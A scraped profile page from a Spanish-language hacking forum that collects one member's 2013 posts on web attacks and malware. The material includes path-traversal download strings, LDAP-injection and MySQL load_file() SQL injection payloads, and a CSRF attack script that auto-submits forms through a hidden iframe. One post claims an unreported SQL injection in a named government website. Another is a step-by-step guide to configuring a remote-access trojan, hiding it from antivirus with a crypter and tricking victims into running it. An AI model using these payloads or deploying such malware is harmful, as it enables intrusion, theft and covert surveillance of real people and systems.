This site uses cookies own and third. If you continue to browse consider to accept the use of cookies. OK More Info.

Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Messages - M5f3r0

Pages: [1] 2 3
1
You are not allowed to view links. Register or Login
Gracias! Muy interesante para probar con las páginas que monte!

Ahora si quisiera probar con otras para chusmear, ¿se puede? ¿queda algún registro?

Pregunto de curiosidad.

Como me fuese gustado haberte respondido al momento, aunque sea un poco vieja la pregunta trae algo de nostalgia ver posts antiguos de la comunidad, gracias a la persona de arriba por haberlo hecho! lastimosamente ahora mismo no recuerdo ni quien era hace más de 3 años :-\ ;D.

2
Off Topic / Re:Que cancion usan como despertador?
« on: November 25, 2013, 09:56:47 pm »
Aquí esta :3:



PD: Tiempo sin hablar por skype bro xD.

3
Bugs y Exploits / Re:Remote File Downloading (RFD) En MySQL
« on: November 06, 2013, 12:17:18 pm »
You are not allowed to view links. Register or Login
saludos compa;

 :o me has dejao  :o

sigue asi compa vas bien

Tiempo sin hablar bro, a ver si alguna noche te conectas al skype ;D.

Saludos!

4
Hacking / Arbitrary File Download
« on: November 02, 2013, 02:54:01 pm »

Ejemplo de Arbitrary File Downloading en Wordpress

Buenas comunidad de Underc0de, Algunos deben saber o pudieron haber notado estuve varios días o hasta creo que hasta 1 MES sin actividad, era debido a que no tuve Internet para comunicarme pero ahora ya me llego la reconexión y intentare hacer post's más seguidos ya sean relacionados con la Seguridad web u la programación, o algún otro tema en particular con referencia a la informática en general. 

Bueno, en fin, en esta ocasión a hablarles acerca de "Arbitrary file download" o en español "Descarga arbitraria de ficheros/archivos", así que vayamos a ello.

Introducción

A lo largo del tiempo se han descubierto muchos tipos de técnicas y metodologías de trabajo acerca de temas variados tanto en la [In]seguridad web como en la [In]seguridad informática, en la que muchos atacantes las emplean para su indebido uso en la auditoria de sistemas informáticos.

En la inseguridad web han surgido múltiples bugs y vulnerabilidades en la cual el nivel de peligrosidad es alto, con las cuales se han llegado a interceptar muchas veces la seguridad del sistema. Por lo tanto, debemos estar atentos a la hora de programar o analizar líneas de código en nuestros ficheros.

Y si vamos a usar una CMS como plantilla de nuestro sitio web, debemos hacer uso de una en la que ya tengamos información acerca de su entorno en el sistema.

Por lo tanto de lo hablado en está pequeña introducción, lo que queremos decir es que la seguridad es muy importante llevarla a cabo en el sitio web, ya que como sabemos aún existen atacantes que no tienen nada de ética y tienen como fin la alteración del sitio web sin razón alguna.

¿Qué es "Arbitrary File Download"?

La Arbitrary file download vendría siendo una técnica perteneciente al árbol de la inseguridad web, en la cual se lleva a cabo la descarga de archivos arbitrarios del servidor web. Por ejemplo, la descarga con referencia a la configuración MySQL del servidor, o hasta podemos llegar a descargar archivos que no se encuentran en el directorio de raíz (si es que tiene el servidor incorporado en su pc y no usa un hosting). Ej: descargar.php?archivo=../.. /.. /.. /Windows/archivo

Esta vulnerabilidad es de un alto peligro, ya que un atacante podría descargar archivos con información privada del usuario que pueda llegar a alterar todo el sistema.

Es provocada debido a que no hay validación en el nombre del archivo a descargar, por lo tanto, debemos añadirle una para evitar que cualquier intruso pueda hacer la descarga de cualquier archivo perteneciente al servidor.

Escenario

Para llevarla a cabo, debemos comprobar si la aplicación es vulnerable. Para ello, debemos realizar un análisis al sitio web para chequear si tiene algún servicio de descarga de archivos, lo más común es la descarga de libros o PDFs en sitios web, entonces, supongamos que tenemos el siguiente parámetro:

descargar.php?archivo=libro.pdf

Como pueden notar, al ejecutarlo la acción automáticamente se descargara el archivo "libro.pdf", PERO, que pasaría si en el código del archivo no hay una validación con el nombre "libro.pdf"?, es decir, podríamos descargar cualquier archivo que se encuentre en el servidor.

Algo fundamental al momento de realizar este proceso, es tener el cuenta el ../ , con lo cual se realiza un recorrido hacía atrás de directorio. Es decir, si el archivo vulnerable se encuentra dentro de una carpeta y queremos descargar un archivo que se encuentra fuera de esa carpeta, deberíamos hacer un recorrido hacía atrás, para ello usamos el ../ , ejemplo:

descargar.php?archivo=../index.php

Y automáticamente se descargara el archivo "index.php". Con esto, ya tendremos por seguro que la aplicación es vulnerable.

Metodología de trabajo

Aquí les vengo a mostrar una metodología de trabajo para su uso al momento de tener una aplicación web vulnerable, es el proceso de análisis en el archivo, debemos ver si existe o se está requiriendo de algún otro archivo del servidor, por ejemplo si vemos que se requiere un proceso en un formulario podemos seguirlo y descargarlo.

Si conocemos alguna otra página existente en el sitio web, lo descargamos igualmente en el servidor y vemos que tiene incluido, más que todo deberíamos descargar una página en la que notemos que requiere de la ejecución de consultas al servidor MySQL, ya que estás páginas requieren de la configuración a la base de datos.

La mayoría de estás páginas pueden ser:

- Página de contactos
- Registro
- Logeo
- Noticias con comentarios
- Búscadores


Entre otros, aunque también podemos usar el método brute force.

Otro método de trabajo sería la búsqueda de archivos fuera del directorio raíz, un ejemplo sería lo siguiente:

descargar.php?archivo=../.. /.. /.. /Windows/System32/drivers/etc/hosts

Con esto descargaríamos el archivo "hosts" de la carpeta windows.

Y bueno, eso ha sido todo! espero les haya gustado.

Saludos, M5f3r0!

5
Bugs y Exploits / LDAP Injection (Lightweight Directory Access Protocol)
« on: November 01, 2013, 02:16:57 pm »

LDAP

Las siglás de "LDAP" hacen referencia a "Lightweight Directory Access Protocol" o en español "Protocolo Ligero de Acceso a Directorios", es un protocolo de acceso ligero a directorios en el cual hay almacenado un conjunto de información de una red especifica. Existen distintas versiones de LDAP, por ejemplo, en Windows existe "You are not allowed to view links. Register or Login", es un servicio de directorio perteneciente a Microsoft, es decir, es como un protocolo de LDAP compatible con Windows, también existe Apache directory service, supongo que muchos ya deben conocer Apache. En LDAP se ejecutan querys/consulta, es un poco parecido a SQL.

Inyección LDAP

Entonces, con la definición de LDAP ya tenemos nuestras deducciones sobre que es la Inyección "LDAP" , La inyección LDAP básicamente es una técnica con la cúal "alteramos" los datos de validación de entrada que ejecutamos al procesar una acción, es casi parecida a la Inyección SQL pero está usa filtros, por ejemplo, Tenemos un formulario HTML con el cual vamos a hacer una búsqueda de texto en un sitio web; procesamos los datos de entrada y nos da como resultado si se encontró algún texto que este relacionado con lo ingresado. Podemos alterar la consulta que se ejecuta en el protocolo LDAP de manera que nos devuelva como por ejemplo la credencial de X usuario de una cédula de identidad. De la siguiente manera:

Escenario

Formulario HTML:

Code: (HTML5) You are not allowed to view links. Register or Login
Búscar: <input type="text" name="user" />
<input type="submit" value="Buscar" />
</form>

Más o menos ese sería el formulario, entonces, cuando ejecutamos esto se ejecuta una query de parte de LDAP procesando los datos, de la siguiente manera:

Procesamiento:

Code: (LDAP) You are not allowed to view links. Register or Login
string user = Request.Querystring("user")
String ldapSearchQuery = "(cn=" + user +")";

Allí, Con Request.Querystring("user") estamos requiriendo en la query la cadena de la entrada "user", es decir, del input user, en la otra línea estamos haciendo una BUSQUEDA de un string/cadena, y hacemos entre los parentesis un filtro con el cúal usamos el atributo "cn" (nombre común o Common Name), entonces, esto sería igual a una concatenación de los datos enviados en el input.

Entonces, si un atacante ejecuta lo siguiente en el formulario:

"m5f3r0)(|(email=*)"

Básicamente ya tenemos una idea de lo que hace, esto nos retornara el email del usuario "m5f3r0"

Allí, los filtros serían lo que va entre parentesis (), también estamos haciendo uso del operador lógico OR | , existen otros dos como AND & y NOT ! .

Podemos notar en la consulta del procesamiento que usamos "string" y "String" ambos significan el llamado de una cadena.

Hemos logrado alterar la consulta como si fuese una ejecución remota, entonces, mediante la validación de entrada hemos retornado un valor "privado" de un usuario.

Operadores lógicos:

AND: &
OR: |
NOT: !


Para hacer uso de los operadores lógicos, iniciamos con un paréntesis () (filtro). y entre el paréntesis colocamos el operador , luego iniciamos con otro paréntesis con el atributo y su respectivo valor.

(&(atributo=resultado))

Y si colocamos otro atributo simplemente luego de eso abrimos otro parentesis. De está misma forma, podemos usar otros operadores.

Creación de consultas

Para la creación de consultas debemos tener conocimientos básicos acerca de como funcionan algunos filtros de LDAP, operadores, uso de atributos, etc. Para ello, existe mucha documentación en línea que con leerla les garantizo que ya sabrán crear sus propias consultas. Aquí les dejo algunos sitios para aprender mucho más:

You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

Bueno, eso ha sido todo, espero les haya gustado el tema aunque fuese poco con poca documentación, actualmente estoy estudiando más está técnica ya que es un POCO complicada, a pesar de la poca información que existe en la red. Tal vez haga más post con más información completa acerca de esto mismo.

- Créditos:

- M5f3r0: Por el post y las explicaciones acerca de la Inyección LDAP.
- Elladodelmal: Por el post acerca de la inyección LDAP, fue mi guía de referencia y allí es dónde estoy estudiando más acerca de está técnica.
- e-securing.com: Otra guía de referencia, y la query/consulta de búsqueda de una cadena/string me la hice en base al planteamiento dado allí.

- Referencias:

You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

Saludos, M5f3r0!

6
Bugs y Exploits / Re:Remote File Downloading (RFD) En MySQL
« on: October 29, 2013, 04:41:37 pm »
You are not allowed to view links. Register or Login
muy bueno el tutorial  , pero tienes que tener la ruta completa del archivo a descargar seria bueno que tambien expliques eso

En realidad, no es dificil conseguir la ruta del archivo, simplemente debes tener un full path disclosure del sitio.

7
Bugs y Exploits / Remote File Downloading (RFD) En MySQL
« on: October 20, 2013, 01:35:39 pm »
Buenas comunidad de underc0de, como algunos pudieron haber notado estube varios días o hasta 1 mes sin actividad en la red, ya que no he tenido internet para conectarme, me podrán ver los online solo los fines de semana hasta que me llegue la reconexión. Pero bueno, en fin, comenzemos con el post.

Ciertas veces cuando estamos auditando la base de datos de un servidor web, podemos notar que no encontramos mucha información (solo en algunos casos) solo acerca de almacenamiento y logs de usuarios o secciones del servidor, esto es debido a que muchos de los programadores almacenan y registran datos en ficheros o archivos locales del servidor web tales como la conexión al MySQL, datos generales acerca del funcionamiento de procesos en páginas del sitio, etc.

Para ello, existen varios métodos para la extracción de información en ficheros, pero en está ocasión veremos algo acerca de "RFD" o "Remote file downloading" lo cúal es útil para extraer la source de archivos, en dónde, extraeremos la información mediante funciones de gestores de bases de datos tales como MySQL, Oracle, etc.

1.- ¿Qué es RFD?


RFD vendría siendo un proceso mediante el cúal un atacante sería capaz de descargar ficheros o sources de archivos que se encuentran en un servidor web, tales como la index/página principal, página de contactos, o hasta ficheros con información que puedan corromper toda la seguridad del sitio web.

Un método para ejecutar un proceso de RFD sería mediante gestores de bases de datos, tales como MySQL o oracle, en la que usamos funciones para leer o descargar archivos del servidor web. Pero en este caso, lo veremos con MySQL ya que no estoy muy especializado que se diga con otros gestores.

- MySQL:

En MySQL existe una función la cúal permite el contenido o source de un archivo en un servidor web, pero para poder ejecutar la función es necesario que el usuario MySQL tenga un cierto privilegio, llamado "FILE".

La función se llama "load_file()", por lo tanto, la debemos ingresar en la columna vulnerable, por ejemplo (Union based):

UB (Union based):

"UNION SELECT 1,load_file(0xnombredearchivohex),3,4,5,6 #".

Ese se ejecuta en una SQLi de tipo Union Based.

Blind Boolean Based:

En una Blind Boolean Based, como sabemos, obtenemos los resultados basándonos en valores booleanos, ya sea "true or false" o "verdadero y falso". Por lo tanto, obtendremos uno de los dos resultados.

"and ascii(substring(load_file(0xarchivoenhexadecimal), 1,1)=97"

En este caso, le estoy preguntando al servidor si el primer carácter de la source del archivo codificado en hexadecimal comienza con la letra "a", Este me respondera con un valor true or false.

Bueno, eso ha sido todo, espero les haya gustado. Saludos!

8
Listo, modifique los permisos para público online (es decir, cualquiera).

Saludos!

9
Buenas comunidad de Underc0de, en está ocasión les presento un nuevo PDF que he escrito por casi un mes, se trata acerca de la MySQL Injection o SQL Injection en MySQL, no tiene mucho contenido que se diga, pero trae algunas técnicas útiles para el momento de vulnerar un sitio web o servidor. Espero sea de su agrado.

- Índice de temas:

Acerca de.. :

1.   Saludos …………………………………………………………………………………………………… 11
2.   Contáctame …………………………………………………………………………………………… 12
3.   Créditos ………………………………………………………………………………………………….. 13

MySQL Injection:

1.   El uso de un Full path disclosure …………………………..………………………………… 3
2.   Hex + INTO OUTFILE() (Union based) ……………………………………………………… 5
3.   load_file() ………………………………………………………………………………………………… 7
4.   Blind Boolean Based: ………………………………………………………………………………. 8
-   Extrayendo el nombre de la DB ……………………………………………………………… 8
-   Extrayendo los nombre de las tablas ………………………………………………………… 9
-   Extrayendo los nombres de las columnas ……………………………………………….. 10
-   Extrayendo los registros de una tabla ……………………………………………………… 10
-   Proceso automatizado con SQLmap ……………………………………………………….. 11

- Leer online: You are not allowed to view links. Register or Login

- Descargar: You are not allowed to view links. Register or Login

Espero les guste. Saludos! M5f3r0.

10
Hacking / Re:Aplicación para enviar comandos a pc remota (Windows)
« on: September 29, 2013, 08:08:16 pm »
Excelente aporte!! ;D.

Vas por muy buen camino amigo :), sigue así ;).

Saludos, M5f3r0!

11
Hacking ShowOff / www.inameh.gob.ve - SQL Injection [UB]
« on: September 28, 2013, 02:32:48 pm »
Buenas comunidad de underc0de, en está ocasión les comparto una nueva SQLi Union based que encontré testeando en "inameh.gob.ve", espero les guste y sea de su agrado :).

- Imágen:



- Autor: M5f3r0
- Tipo: SQLi
- Método: GET
- URL vulnerable: You are not allowed to view links. Register or Login
- Reportado?: No.

Un saludo, M5f3r0!

12
Off Topic / Re:Feliz Cumpleaños ANTRAX
« on: September 24, 2013, 05:34:18 pm »
Feliz cumpleaños amigo!!, espero que la pases bien en tu día y que sigas cumpliendo muchos más! Y que la net te traiga muchos más bugs y exploits a tu ordenador ;D.

Saludos, M5f3r0!

13
Bugs y Exploits / Re:Ataques CSRF (Cross site request forgery)
« on: September 09, 2013, 03:48:08 pm »
You are not allowed to view links. Register or Login
Saludos.

En
Code: You are not allowed to view links. Register or Login
     
    <?php
     
    $urlvulnerable 
"localhost"// Link del sitio
    
$valor "M5f3r0 was here!"// Valor a modificar
     
   
[b] echo '<form action="'.$urlvulnerable.'/process.php" name="csrf" method="POST">'// Ingresamos la url del formulario a ejecutar[/b]
    
echo '<input type="hidden" value="'.$valor.'" name="text" />'// Ingresamos el nombre del input y el valor a ingresar.
    
echo '<body onload="document.csrf.submit();">'// Ejecutamos el documento con el script "document.csrf.submit();"
    
echo '</form>';
     
    
?>

     
Falta poner http:// delante por que sino lo coge como una carpeta y entonces va a localhost/localhost/process.php por lo que quedaría así echo '<form action="'http://.$urlvulnerable.'/process.php" name="csrf" method="POST">'; // Ingresamos la url del formulario a ejecutar

otra cosa, probe lo del post y no puedo hacer que el "exploit" funcione.

No sé porque dicen que no les funciona, con mi configuración a mi me corría perfectamente sin error alguno.

Saludos.

14
Ideas y Sugerencias / Re:[PROPUESTA] Taller de Autoit
« on: September 05, 2013, 05:25:33 pm »
A mí también me agrada la idea de un taller sobre AutoIt, sobre todo porque actualmente estoy estudiando ese lenguaje. No sería tan mala la idea, solo es cuestión de que algún miembro o staff del foro se dedique a ello ;D.

Un saludo ;).

15
Bugs y Exploits / Re:Ataques CSRF (Cross site request forgery)
« on: September 04, 2013, 01:14:27 pm »
You are not allowed to view links. Register or Login
2 errores mas! XD

a cada archivo le debes poner session_start() para crear o activar las sessiones como nuestro amigo php.net nos dice XD, sino no nos funcionaran las sessiones! y no veo que se lo hayas puesto a los archivos xD

ademas aca

Quote from: php
echo '<form action="process.php?token='.$_SESSION["envio_token"].'" method="post">';

la variable que creas se llama token y aca

Quote from: php
if($_GET["envio_token"] == $_SESSION["envio_token"]){ 

aqui tratas de obtener por get la variable "envio_token", por logica el script funcionara mal
acaso no probaste tus script bro? :/
los probé y no funcionaban xD


Aqui los que si me funcionaron

Code: (php) You are not allowed to view links. Register or Login
<html>
   <head><title>Hola</title></head>
   <meta charset="utf-8">
   <body>
        <?php 
session_start();
$_SESSION["envio_token"] = sha1(uniqid(rand(), TRUE));
        echo 
'<form action="process.php?token='.$_SESSION["envio_token"].'" method="post">';
                 echo 
'Ingrese algún texto: <input type="text" name="text"><br><br>';
                                 echo 
'<input type="submit" value="Ejecutar">';
        echo 
'</form>';
                
?>

   </body>
</html>

Code: (php) You are not allowed to view links. Register or Login
<html>
   <head>
   <title>Proceso</title>
   </head>
   <body>
        <?php
session_start();

             if(
$_GET["token"] == $_SESSION["envio_token"]){       
                         echo 
'Se ha ejecutado el token correctamente';
    }
        else{
    echo 
'Error';
            }
       
?>

   </body>
</html>

A mí me funcionaron perfectamente con mi configuración. Pero de todas formas si tienes razón ya está actualizado.

Saludos.

16
Bugs y Exploits / Re:Ataques CSRF (Cross site request forgery)
« on: September 03, 2013, 10:40:06 pm »
You are not allowed to view links. Register or Login
Quote
Bueno, eso ha sido todo. Espero les haya gustado, si me equivoco en algo corrijanme y actualizo el post

aca:

Code: You are not allowed to view links. Register or Login
<?php
 
$urlvulnerable 
"localhost"// Link del sitio
$valor "M5f3r0 was here!"// Valor a modificar
 
echo '<form action="'.$urlvulnerable.'/process.php" method="POST" />'// Ingresamos la url del formulario a ejecutar
echo '<input type="hidden" value="'.$valor.'" name="text" />'// Ingresamos el nombre del input y el valor a ingresar.
echo '<body onload="document.csrf.submit();">'// Ejecutamos el documento con el script "document.csrf.submit();"
echo '</form>
 
?>

te falto ponerle el nombre al form si no no se ejecutaria este javascript: document.csrf.submit() osea solo te falto la etiqueta name="csrf" en
<form action="'.$urlvulnerable.'/process.php" method="POST" name="csrf"> ademas no debes cerrar / al principio es decir:
<form action="'.$urlvulnerable.'/process.php" method="POST" /> por que ya esta siendo cerrada en </form>, bueno bro nada mas eso solo comente por que al final dijistes espero que no me lo tomes a mal ya sabes que yo te estimo mucho bro un saludo :P

LOL, es cierto, me equivoque, gracias bro. Actualizado!

Un saludo.

17
Bugs y Exploits / Ataques CSRF (Cross site request forgery)
« on: September 03, 2013, 08:15:10 pm »
Ejemplo de ataque CSRF

Un ataque CSRF/XSRF o Cross site request forgery vendría siendo un exploit o vulnerabilidad la cúal se da en aplicaciones web en la que el usuario víctima realiza ciertas peticiones falsificadas en aplicaciones web vulnerables, la víctima al abrir la CSRF automáticamente lograra ejecutar u/o modificar registros sin su intención.

Para poder llevarse a cabo un ataque CSRF se debe hacer uso de la ingeniería social, con la cúal podamos lograr que el usuario víctima acceda a nuestra página la cúal debe tener el csrf oculto, está se encargara de ejecutar el CSRF sin que el usuario víctima se pueda dar cuenta.

Código vulnerable

Un código vulnerable podría ser el siguiente:

pagina.html :

Code: (HTML5) You are not allowed to view links. Register or Login
<form action="process.php" method="POST">
Texto: <input type="text" name="text" /><br><br>
<input type="submit" />
</form>

Como pueden observar, no hacemos ningún envío de token para tener una identificación única. Con lo cúal, nuestro formulario es vulnerable a ataques CSRF. En este caso, solo tenemos un simple formulario que no almacena ni registra nada, pero imagínense uno que sí. Sería de grave peligro.

process.php :

Code: (PHP) You are not allowed to view links. Register or Login
<?php
if(isset($_POST['text']) && !empty($_POST['text'])){
 echo 
"Hola";
}
else{
echo 
"Error";
}
?>

Este es solo un simple proceso, el cúal verifica si el input de texto "text" no este vacío. si es así, lanza un mensaje diciendo error.

Preparando nuestro código CSRF de ataque

Pues para preparar el escenario de ataque, el atacante necesita tener conocimientos en la programación web, ya sea PHP, JS u HTML. Aquí les presento una estructura de código en php la cúal he creado especialmente para el formulario anterior vulnerable:

Code: (PHP) You are not allowed to view links. Register or Login

<?php

$urlvulnerable 
"localhost"// Link del sitio
$valor "M5f3r0 was here!"// Valor a modificar

echo '<form action="'.$urlvulnerable.'/process.php" name="csrf" method="POST">'// Ingresamos la url del formulario a ejecutar
echo '<input type="hidden" value="'.$valor.'" name="text" />'// Ingresamos el nombre del input y el valor a ingresar.
echo '<body onload="document.csrf.submit();">'// Ejecutamos el documento con el script "document.csrf.submit();"
echo '</form>';

?>


En este código simple, solamente ejecutamos el valor ingresado en el csrf en la página web vulnerable, identificándonos como nuestro usuario víctima.

Camuflando nuestra CSRF

Existe un método para evitar que nuestro CSRF de ataque se note sospechoso, sería camuflando nuestro código de ataque mediante el uso de HTML u algún otro lenguaje de programación web, tal como JS, jQuery, HTML, o tal vez un simple index en el que camuflamos nuestro código mediante el uso de un <iframe> en html.

Un ejemplo sería el siguiente, en el que camuflamos nuestro CSRF en una index con un iframe:

Code: (HTML5) You are not allowed to view links. Register or Login
<html>
<head><title>[email protected]</title></head>
<body>

<h1>[email protected] a mi sitio web :)</h1>

<iframe src="http://websitedelatacante.com/csrfoculto.php" width=0% height=0% />

</body>
</html>

Aunque es muy claro que este se nota muy sospechoso, es cuestión de saber HTML5 y montar una index común y corriente, para luego enviarsela a la víctima.

Defensa

Para poder defendernos de este tipo de ataques, yo recomiendo hacer uso de algún envío de un token como una sesión en php. Haciendo uso de la función session_start() , el hash md5() u sha1() para la encriptación, uniqid() para un identificador único y rand() para dar un entero aleatorio. Ejemplo:

token.php :

Code: (PHP) You are not allowed to view links. Register or Login
<?php

session_start
();

?>

<html>
   <head><title>Hola</title></head>
   <meta charset="utf-8">
   <body>
        <?php $_SESSION["envio_token"] = sha1(uniqid(rand(), TRUE));
        echo 
'<form action="process.php?envio_token='.$_SESSION["envio_token"].'" method="post">';
                 echo 
'Ingrese algún texto: <input type="text" name="text"><br><br>';
 echo '<input type="submit" value="Ejecutar">';
        echo 
'</form>';
?>

   </body>
</html>

Y cómo pueden observar, tenemos un identificador único y un número aleatorio cifrado en sha1 como sesión. Y luego ejecutamos el token por el método GET.

process.php :

Code: (PHP) You are not allowed to view links. Register or Login
<html>
   <head>
   <title>Proceso</title>
   </head>
   <body>
        <?php
             
if($_GET["envio_token"] == $_SESSION["envio_token"]){  
 echo 'Se ha ejecutado el token correctamente';
    }
else{
    echo 
'Error';
            }
       
?>

   </body>
</html>

Y en este proceso, comprobamos que el token que se envío por el método GET es el mismo de la sesión que tenemos iniciada. Si es así, muestra un mensaje avisando que todo se ejecuto correctamente.

Bueno, eso ha sido todo. Espero les haya gustado, si me equivoco en algo corrijanme y actualizo el post ;D.

Un saludo, M5f3r0.

18
Batch - Bash / Re:Windows Password Cracker
« on: September 02, 2013, 11:25:07 pm »
Muy bueno, se agradece el aporte.

Sigue así compa!, saludos ;).

19
Imágen del primer RAT desarrollado por Caesar2k

Buenas comunidad de underc0de, en está ocasión les traigo un RAT llamado "Bozok 1.4" con la configuración del servidor para el troyano. También les traigo un Crypter 100% FUD el cual me lo encontré en You are not allowed to view links. Register or Login (no es mío), . Primero que nada, daremos una explicación de que es un RAT y un Crypter FUD,

1.- ¿Qué es un RAT?

Un RAT "Remote administration tool", como su nombre lo indica, vendría siendo una herramienta para la administración remota de nuestro troyano el cúal lo debemos tener alojado en un servidor configurado, que al abrirlo automáticamente la víctima queda totalmente infectada y el atacante podrá administrarlo de manera remota. El primer RAT fue desarrollado por un hacker informático llamado "Caesar2k", salio por primera vez el año 2003.

El nivel de peligrosidad es de alto riesgo o muy grave ya que el atacante puede ver el escritorio de manera remota, usar un keylogger si es que lo tiene incorporado y hasta activar la webcam de la víctima sin que se de cuenta.

En este tutorial veremos como configurar nuestro servidor para el troyano con el RAT llamado "Bozok 1.4" y entederemos como usar un Crypter FUD.

2.- ¿Qué es un Crypter FUD?

Un crypter vendría siendo la herramienta con la cúal encriptamos nuestro troyano con el fin de hacerlo indetectable para el antivirus de la víctima, de manera que cuando sea ejecutado este mismo no lo detecte. Y "FUD" vendría siendo "Full un-detectable" y en español "Completamente indetectable".

3.- Abriendo puertos y configurando las conexiones:

Antes de configurar el servidor del RAT, para los que tienen un router yo les recomiendo tener el puerto 81 abierto, TCP y UDP. El cúal es como un puerto alternativo del 80, También puede abrir si quieren el 1515.

Para abrir el puerto nos dirigimos a la ruta del router, en mi caso es 192.168.0.1, Mi router es de la marca Nexxt y lo configuro de la siguiente manera:

LAN IP (en mi caso): 192.168.0.100 (Para verificar cúal es la suya en windows, vayan a la CMD y tecleen ipconfig, y colocan la que sale en IPv4)
Protocolo: Both (los dos, TCP y UDP).



Luego de esto, debemos registrarnos en You are not allowed to view links. Register or Login , les enviara un email de confirmación de cuenta, lo activan y se logean de forma normal.

 Luego de esto se van a: You are not allowed to view links. Register or Login , En el que se crearan un host, para ello darán click en "Add Host" y en el campo de formulario "Hostname:" colocan el nombre de su dominio, luego de eso le dan click en el botón nuevamente "Add host".



Después de esto, nos vamos a la página principal del no-ip y abrimos la sección "Download" de la barra de navegación, en el que vamos a descargar el No-ip duc, el cliente de actualización dinámica de DNS. Click en "Download now" y instalan el no-ip duc. Ya instalado esto ejecutamos el no-ip DUC y nos saldra una pequeña ventana con 3 opciones, primero daremos click en la 1ra opción dónde especificaremos nuestro login y password de nuestra cuenta.

Luego de haberse logeado damos click en "Edit Hosts" y seleccionamos la casilla del host de la conexión del troyano. Y automáticamente se irá refrescando el host.

Ahora nos vamos a la siguiente ruta:

C -> Windows -> System32 -> drivers -> etc y damos click derecho sobre el archivo hosts, luego click en propiedades y abrimos la opción "seguridad" y damos click en Usuarios luego en editar para modificar los privilegios.

Luego activamos todas las casillas:



Ahora tenemos todos los permisos para modificar los archivos, con algún editor de texto ejecutamos el archivo hosts, y tendremos lo siguiente incorporado (si es que no ha sido modificado):

Code: You are not allowed to view links. Register or Login
0# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      *****     rhino.acme.com          # source server
#       ******     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
# 127.0.0.1       localhost
# ::1             localhost
127.0.0.1        localhost

En una nueva línea, especificamente debajo de 127.0.0.1 colocamos la dirección LAN que especificamos en la del puerto 81, en mi caso es 192.168.0.100 , y a un espacio colocamos el dominio de nuestro host que hemos creado en el no-ip , en mi caso es "muferorat1.zapto.org" , ejemplo:



Luego guardamos los cambios y listo, tenemos las conexiones configuradas del troyano.

4.- Configurando el servidor del troyano:

Para configurarlo, primero debemos ejecutarlo abriendo el exe "Client" (es 100% seguro está limpio):

Luego de esto, se nos abrirá la siguiente ventana:



Damos click en el icono inferior de abajo que está al lado derecho de la llave, Se nos abrirá una ventana en la que especificaremos el puerto, en dónde dice "Listen on port" reemplazamos el 1515 por el 81 y en la parte de abajo, colocamos la contraseña que quieran, ej: 123123.

Y marcamos las dos casillas que están debajo. Una que es para la auto-carga de plugins y otra para la auto iniciada de la captura de pantalla. Luego damos click en "Save"



Bien, ya realizado este paso, damos click en el icono de la llave que está al lado izquierdo, dónde se nos abrira una ventana la cúal es la configuración del servidor.

En dónde dice "Server ID" colocaremos el nombre o algún texto que se le dara a una victima, ej: Usuario conectado , Y en password igual colocan: 123123 . Luego en puerto colocan el 81.

Después de esto, en el campo vacío de abajo damos click derecho y damos click en "Add conection" , se nos abrira una ventana en la que especificaremos "SOLO" la url de nuestro host creado en el no-ip , esta sera la del servidor, Luego le dan en OK.



Ahora pasamos al siguiente paso, damos click en "Installation", aquí marcaremos la casilla "Install server", en dónde especificaremos el nombre del archivo.

La siguiente opción "Visible mode" sera en caso de que la vayamos a testear a ver si funciona, si es así les recomiendo activarla.



Luego nos vamos al siguiente paso, llamado "Startup" , en este paso colocamos nuestro nombre o cualquier nombre, ej: "M5f3r0".

Después de esto nos vamos a "Extension" , Aquí simplemente especificamos la extensión de nuestro archivo ejecutable. Le colocamos la extensión que llevara, en mi caso sera .exe , Luego marcamos la casilla "Include Extension".



Ahora pasamos a "Build" , en el que nos saldrá el nombre del archivo ejecutable , ya teniendo todo listo damos click en "Build" para guardar los cambios.

Aviso: Debemos tener el antivirus desactivado como por 10 minutos para poder guardar los cambios en el archivo ejecutable, si no, lo movera al baúl de virus.



Y luego tendremos todo listo, el troyano creado satisfactoriamente. Ahora procederemos a su encriptación con el Crypter FUD para hacerlo indetectable ante el antivirus.

5.- Encriptando el troyano con el Crypter FUD

Antes de ejecutar este crypter debemos instalar "Ronda OCX" , para ello abrimos el instalador y damos click en Next -> next -> hasta que se termine la instalación.

Luego podemos ejecutar el crypter abriendo el archivo "Project1". Luego se nos abrirá lo siguiente:



Daremos click en el primer botón en dónde seleccionaremos la ruta en dónde se encuentra nuestro troyano, luego daremos click en el siguiente botón para especificarle el nombre y la ruta en dónde lo guardaremos.

Después de esto, nos saldra una alerta diciendo "Pronto" es decir, el archivo ejecutable ya lo tendremos encriptado por lo cúal el antivirus no lo podrá detectar.

Ahora es cuestión de usar la ingeniería social para mandarle nuestro troyano a la victima para que la pueda ejecutar y quede totalmente infectada.

- Pruebas de que funciona el Crypter:

You are not allowed to view links. Register or Login



- Créditos:

* M5f3r0 (Mufero): Por el post, las explicaciones y la configuración del servidor para el troyano.
* J0R4X: Por algunas explicaciones.
* sudo (de indetectables.net): Por el crypter, no se si sea de él, ya que fue quien realizo el post. You are not allowed to view links. Register or Login
* Slayer616: Coder del rat (creador).
* Coughs: Tester del rat.
* DarkPringles: Tester del rat.

- Descargas:

RAT:

You are not allowed to view links. Register or Login

Crypter FUD:

You are not allowed to view links. Register or Login

Trae contraseña, tendrán que decodificarla: -.. .-. .- --. --- -.

Post del crypter: You are not allowed to view links. Register or Login

Instalador Ronda OCX:

You are not allowed to view links. Register or Login (el enlace no es mío)

- Aviso importante:

No me hago responsable del uso que le den a la herramienta y lo empleado en el tutorial, fue realizado solo con fines educativos.

Eso ha sido todo amigos, saludos y espero les haya gustado el post.

20
Bugs y Exploits / Re:CSRF'S miarroba forums [By Pekador]
« on: August 27, 2013, 04:50:32 pm »
Excelente post compa, al dueño le haría bien colocar token para evitar los ataques CSRF's..

Saludos!

Pages: [1] 2 3